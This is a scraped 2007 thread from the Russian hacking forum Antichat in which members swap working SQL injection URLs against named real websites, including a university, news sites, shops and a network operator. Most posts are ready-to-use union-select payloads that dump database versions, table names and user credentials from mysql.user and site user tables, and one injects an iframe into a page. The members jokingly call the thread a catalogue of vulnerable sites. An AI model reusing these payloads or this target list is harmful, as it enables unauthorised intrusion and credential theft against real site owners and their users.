Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
19.03.2007, 17:28
|
|
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885
Репутация:
447
|
|
2Spyder
но там походу фильтрация при переборе колонок идет
это не перебор колонок?http://www.0577.ru/index.php?region_id=-1+union+select+COLUMN_NAME+FROM+INFORMATION_SCHEMA .COLUMNS+limit+17,100/*
Сообщение от Spyder
}{0TT@БЬ)Ч, гыб а ты попробуй теперь чё нить вывести
вот тебе к примеру
таблица - auth_user
колонки - user_name, user_password
upd:
Spyder вроде статью написал а такие простые вещи не знаешь 
http://www.0577.ru/index.php?region_id=-1+union+select+AES_DECRYPT(AES_ENCRYPT(concat(user _name,char(58),user_password),0x71),0x71)+from+anu m_new.auth_user+limit+0,1/*
Последний раз редактировалось }{0TT@БЬ)Ч; 19.03.2007 в 17:37..
|
|
|
19.03.2007, 17:47
|
|
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885
Репутация:
447
|
|
Сообщение от Spyder
}{0TT@БЬ)Ч, я делал такой запрос
http://www.0577.ru/index.php?region_id=-1+union+select+concat(user _name,char(58),user_password)+from+auth_user+limit+1,1/*
и теперь посмотри на свой
у тебя anum_new.auth_user, я просто базу правильную не подобрал
=\
Spyder ее не надо подбирать 
TABLE_SCHEMA+FROM+INFORMATION_SCHEMA.TABLES+WHERE+ TABLE_NAME='тут название таблицы'/* выводит в какой базе находиться таблица.
извиняюсь за оффтоп 
Последний раз редактировалось }{0TT@БЬ)Ч; 19.03.2007 в 17:50..
|
|
|
|
19.03.2007, 18:03
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
http://www.uca.edu/maptour/index.php?id=-6+union+select+1,2,3,4,version(),6
судя по версии сервак на винде =\
|
|
|
|
19.03.2007, 18:17
|
|
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047
Репутация:
930
|
|
Сообщение от Spyder
судя по версии сервак на винде =\
Код:
http://www.uca.edu/maptour/index.php?id=-6+union+select+1,2,3,4,password,6+from+mysql.user/*
http://www.flirtanica.ru
Код:
http://www.flirtanica.ru./articles1.php?id=-1+union+select+1,version(),3,4,5/*
http://www.gelezo.net
Код:
http://www.gelezo.net/files.php?id=1'+union+select+1,2,3,4,5,version(),7,8,10,11,12,13/*
Кстати, мы всем этим сайтам повышаем популярность, это как каталог бажных сайтов =)
Последний раз редактировалось Ksander; 19.03.2007 в 18:29..
|
|
|
|
19.03.2007, 18:45
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Код:
http://www.chita.ru/firms/index.php?page=view&id=-1+union+select+1,2,3,4,5,convert(concat(database(),char(58),user(),char(58),version()),char),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
Код:
http://www.foodpages.ru/show_firm.php?id_firm=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat(database(),char(58),user(),char(58),version()),12,13/*
Код:
http://vdd.com.ua/Tovaru.php?idr=-1+union+select+concat(database(),char(58),user(),char(58),version())/*
|
|
|
|
19.03.2007, 19:52
|
|
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641
Репутация:
590
|
|
Код:
http://www.michaelpollan.com/article.php?id=80%20UNION%20SELECT%201,user(),3,4,5,6,7,8,9,10+limit+1,1/*
Код:
http://www.spectrum.am/eng/articles.php?id=-60'+union+select+1,2,version()/*
Код:
http://www.forumweekly.am/index.php?id=-18+union+select+1,2,user(),4,5,6/*
Код:
http://www.xgroup.am/news.php?id=-17+union+select+1,2,3,4,version(),6,7/*
www.footballshop.am
Код:
http://www.footballshop.am/shop.php?id=-89+union+select+1,concat(name,0x3a,pwd)+from+user/*
http://www.footballshop.am/shop.php?id=-89+union+select+1,table_name+from+INFORMATION_SCHEMA.TABLES/*
Код:
http://design.barsmedia.am/news.php?id=-13+union+select+1,2,table_name,4,5,6,7,8+from+INFORMATION_SCHEMA.TABLES/*
http://design.barsmedia.am/news.php?id=-13+union+select+1,2,user(),4,5,6,7,8+from+users/*
|
|
|
|
19.03.2007, 20:13
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
Код:
http://www.switch.ch/de/about/news-archive.html?id=-120+union+select+1,2,3,4,5,6/*
Одна из идеальных скулей...
Код:
http://www.wattstopper.com/newsroom/news.html?id=-56+union+select+concat_ws(char(58),user,password),2,3,4+from+mysql.user/*
С таблицам неприятность =\
Код:
http://www.cop-morrien.de/news.html?id=-19+union+select+1,2,3,4,5,version(),database(),8,9,10,11,12/*
Код:
http://www.net-zone.ru/news.html?id=1+union+select+concat_ws(char(58),user,password),2,concat(version(),char(58),user(),char(58),database()),4+from+mysql.user/*
P.s concat_ws оказался достаточно полезной фичей, имхо)
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
19.03.2007, 20:17
|
|
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047
Репутация:
930
|
|
www.nsu.ru
Новосибирский Государственный Университет
Код:
http://www.nsu.ru/dynamic/news/news_view.php?news_mode=single&news_user=user&news_action=view&news_id=-1+union+select+version(),2,3,4,5,6,7,8/*
Последний раз редактировалось Ksander; 19.03.2007 в 20:25..
|
|
|
|
19.03.2007, 20:58
|
|
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме:
865816
Репутация:
181
|
|
http://www.pizzamarketplace.com/article.php?id=-1+union+select+version(),2,3,4,5,6,7,8/*
|
|
|
|
19.03.2007, 21:11
|
|
Участник форума
Регистрация: 05.12.2006
Сообщений: 112
Провел на форуме:
685950
Репутация:
175
|
|
Даже Алёна рекомендует )
http://www.tonnel.ru/index.php?l=cal'+union+select+1,'%3Ciframe%20src=h ttp://antichat.ru%3E%3C/iframe%3E',3,4,5,6,7+from+forum/*
Последний раз редактировалось *D1VER; 19.03.2007 в 21:14..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
